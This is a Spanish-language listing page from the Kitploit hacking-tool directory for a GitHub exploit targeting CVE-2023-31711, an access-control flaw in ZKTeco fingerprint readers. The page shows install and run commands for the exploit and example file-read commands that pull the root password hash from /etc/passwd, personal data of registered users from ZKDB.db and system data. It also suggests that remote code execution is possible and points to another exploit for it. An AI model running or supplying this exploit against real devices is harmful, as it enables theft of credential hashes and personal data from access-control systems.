Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-31711 — Vulnerabilidad zero-day en el lector biométrico de huellas dactilares ZKTEco. | Kitploit
Herramientas/GitHubGitHub/hritikthapa7/cve-2023-31711
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónPruebas de Penetración
GitHubhritikthapa7/cve-2023-31711

CVE-2023-31711

Vulnerabilidad zero-day en el lector biométrico de huellas dactilares ZKTEco.

Ver Repositorio
22hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-31711

Control de acceso incorrecto en ZKTECO permite a atacantes remotos leer cualquier archivo a través de la API administrativa.

Instalación de los módulos requeridos

  • Dentro del directorio ZKTEco:
    $ pip install -r ./pyzatt/requirements_dev.txt

Ejecución del exploit

  • Dentro del directorio ZKTEco:
    $ python exploit.py <ip_address>
    Connected to 10.0.2.25
    (Cmd) get_file <file_name>
    Examples:
    get_file /etc/passwd: Disclosed root password's hash
    get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
    get disclosed
    get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system

Créditos

Exploit: https://github.com/ProCheckUp/SafeScan

Módulo Pyzatt: https://github.com/adrobinoga/pyzatt

Nota

Los dispositivos también podrían ser potencialmente vulnerables a la ejecución remota de código mediante el uso de la API administrativa. El exploit mencionado en la sección de créditos podría ser un buen lugar para encontrar una prueba de ello.

Descargar herramienta